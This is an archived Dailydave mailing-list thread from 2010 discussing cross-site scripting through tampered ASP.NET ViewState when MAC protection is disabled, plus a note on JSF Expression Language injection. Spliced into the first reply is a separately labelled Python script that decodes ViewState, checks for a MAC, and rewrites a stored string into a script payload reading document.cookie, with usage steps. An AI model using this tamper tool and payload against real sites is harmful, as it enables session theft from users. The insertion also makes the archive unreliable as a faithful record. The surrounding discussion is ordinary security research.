Dailydave mailing list archives

Re: XSS in viewstate


From: David Byrne <DByrne () trustwave com>
Date: Fri, 19 Feb 2010 15:44:29 -0600

In theory, just about all pages will be vulnerable to XSS if MAC is turned off. In practice, it can be difficult to 
launch an attack. One problem is that pages won't use the client's view state if .NET decides it isn't fresh. Some 
pages may happen to be written so that the client-side state is never fresh. 

Again, in theory, it should be possible to add attributes to the view state to form an attack, but I've found it much 
easier to alter existing attributes, usually Text or innerHTML values. ViewStateHacker is a great tool for view state 
analysis but it wasn't really intended for extensive client-side editing. That's what I use now, but it's a pain. 


Regarding Expression Language (EL), it only allows values to be read; you can't set anything. Injecting EL into 
JavaServer Faces view states makes it possible to read server-side session variables (and similarly scoped data).



Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security

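The two practical points above (first check whether a MAC is appended, then edit an existing string rather than add structure) are easy to see with a small decoder. The script below is an added example, not code from the thread, from ViewStateHacker, or from the Watcher tool. It assumes the ObjectStateFormatter layout used for __VIEWSTATE since ASP.NET 2.0: a 0xFF 0x01 header, one token byte per value, 7-bit-encoded lengths and counts, and a MAC simply appended after the serialized value. Only the tokens needed for a small control tree are implemented; the sample blob is constructed here, not captured from a real application, and the page and control names are hypothetical.

```python
import base64

# Token bytes of .NET's ObjectStateFormatter (the serializer behind __VIEWSTATE).
# Only the subset this example needs is implemented.
T_INT16, T_INT32, T_BYTE, T_STRING = 0x01, 0x02, 0x03, 0x05
T_PAIR, T_TRIPLET, T_ARRAYLIST = 0x0F, 0x10, 0x16
T_INDEXED_STRING_ADD, T_INDEXED_STRING = 0x1E, 0x1F
T_NULL, T_EMPTY_STRING, T_ZERO_INT32, T_TRUE, T_FALSE = 0x64, 0x65, 0x66, 0x67, 0x68
SIMPLE = {T_NULL: None, T_EMPTY_STRING: "", T_ZERO_INT32: 0, T_TRUE: True, T_FALSE: False}
HEADER = b"\xff\x01"  # format marker, version 1


def read_7bit(buf, pos):
    """BinaryReader.Read7BitEncodedInt: base-128, little-endian, high bit = more."""
    result = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7


def write_7bit(n):
    n &= 0xFFFFFFFF  # .NET casts to uint before encoding
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def _decode(buf, pos, strings):
    """Return (value, next offset). Pair/Triplet -> tuple, ArrayList -> list."""
    tok = buf[pos]
    pos += 1
    if tok in SIMPLE:
        return SIMPLE[tok], pos
    if tok == T_BYTE:
        return buf[pos], pos + 1
    if tok == T_INT16:
        return int.from_bytes(buf[pos:pos + 2], "little", signed=True), pos + 2
    if tok == T_INT32:
        return read_7bit(buf, pos)
    if tok in (T_STRING, T_INDEXED_STRING_ADD):
        n, pos = read_7bit(buf, pos)
        s = buf[pos:pos + n].decode("utf-8")
        if tok == T_INDEXED_STRING_ADD:
            strings.append(s)  # later occurrences refer back by one-byte index
        return s, pos + n
    if tok == T_INDEXED_STRING:
        return strings[buf[pos]], pos + 1
    if tok in (T_PAIR, T_TRIPLET):
        items = []
        for _ in range(2 if tok == T_PAIR else 3):
            v, pos = _decode(buf, pos, strings)
            items.append(v)
        return tuple(items), pos
    if tok == T_ARRAYLIST:
        n, pos = read_7bit(buf, pos)
        items = []
        for _ in range(n):
            v, pos = _decode(buf, pos, strings)
            items.append(v)
        return items, pos
    raise ValueError("unsupported token 0x%02x at offset %d" % (tok, pos - 1))


def _encode(obj, out):
    if obj is None:
        out.append(T_NULL)
    elif isinstance(obj, bool):  # before int: bool is an int subclass
        out.append(T_TRUE if obj else T_FALSE)
    elif isinstance(obj, int):
        if obj == 0:
            out.append(T_ZERO_INT32)
        else:
            out.append(T_INT32)
            out += write_7bit(obj)
    elif isinstance(obj, str):
        if obj == "":
            out.append(T_EMPTY_STRING)
        else:
            data = obj.encode("utf-8")
            out.append(T_STRING)  # plain form; the real formatter prefers the indexed forms
            out += write_7bit(len(data)) + data
    elif isinstance(obj, tuple) and len(obj) in (2, 3):
        out.append(T_PAIR if len(obj) == 2 else T_TRIPLET)
        for v in obj:
            _encode(v, out)
    elif isinstance(obj, list):
        out.append(T_ARRAYLIST)
        out += write_7bit(len(obj))
        for v in obj:
            _encode(v, out)
    else:
        raise TypeError("cannot serialize %r" % (obj,))


def decode_viewstate(b64):
    """Return (state, trailer): the trailer is whatever follows the value, i.e. an appended MAC."""
    buf = base64.b64decode(b64)
    if buf[:2] != HEADER:
        raise ValueError("no ObjectStateFormatter header: encrypted, or not a viewstate")
    value, pos = _decode(buf, 2, [])
    return value, buf[pos:]


def encode_viewstate(state, trailer=b""):
    out = bytearray(HEADER)
    _encode(state, out)
    return base64.b64encode(bytes(out) + trailer).decode("ascii")


def looks_mac_protected(b64):
    """Passive check: bytes left over once the value has been fully consumed are the MAC."""
    return len(decode_viewstate(b64)[1]) > 0


def replace_strings(obj, old, new):
    if isinstance(obj, str):
        return new if obj == old else obj
    if isinstance(obj, tuple):
        return tuple(replace_strings(v, old, new) for v in obj)
    if isinstance(obj, list):
        return [replace_strings(v, old, new) for v in obj]
    return obj


def tamper_viewstate(b64, old, new):
    """Swap one stored string (e.g. a Label's Text) for a payload, keeping the structure intact."""
    state, trailer = decode_viewstate(b64)
    return encode_viewstate(replace_strings(state, old, new), trailer)


# Constructed sample shaped like a small control tree (hash code, page state,
# child control states); not captured from a real application.
SAMPLE_STATE = (624813293, ("Hello, alice", [(3, ("Welcome back, alice", None))]))
SAMPLE_VIEWSTATE = encode_viewstate(SAMPLE_STATE)
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"
```

Usage: URL-decode the __VIEWSTATE parameter first, run looks_mac_protected() on it, and only then bother editing; with the MAC in place the server rejects any modified blob with a validation error, and a blob that does not even start with 0xFF 0x01 has been encrypted. Real blobs almost always use the indexed string tokens, which the decoder accepts; a ValueError on an unsupported token means the table above needs extending, not that the MAC is on.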




-----Original Message-----
From: dailydave-bounces () lists immunitysec com [mailto:dailydave-bounces () lists immunitysec com] On Behalf Of dave
Sent: Friday, February 19, 2010 12:16 PM
To: Chris Weber
Cc: dailydave () lists immunityinc com
Subject: Re: [Dailydave] XSS in viewstate

We usually see MAC protection turned off on at least one page during an
assessment. Does this mean that you can always have XSS if MAC
protection is turned off? That would be pretty cool.

I'm not familiar with Expression Language, but the TrustWave advisory
indicates that things can be executed on the server as well. What's the
story there?

- -dave
( https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt )


Chris Weber wrote:
One important thing to note is that VIEWSTATE MAC protection is enabled by default.  It's only when this protection 
is purposely disabled that tampering and this XSS vector become possible.  You can detect when this protection has 
been disabled either through code review, or passively with dynamic testing which is what we'll be doing with the 
Watcher tool.

-Chris


-----Original Message-----
From: dailydave-bounces () lists immunitysec com [mailto:dailydave-bounces () lists immunitysec com] On Behalf Of dave
Sent: Friday, February 19, 2010 6:46 AM
To: dailydave () lists immunityinc com
Subject: [Dailydave] XSS in viewstate

http://www.hacking-lab.com/misc/downloads/ViewState_Afames.pdf

This, on first glance, looks real to me. Does anyone have any comments
on it? ViewState is pretty complex and fairly opaque. If I understand
properly, MS does not publish the full specs to it? Maybe the Mono team
found them somewhere?

-dave
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
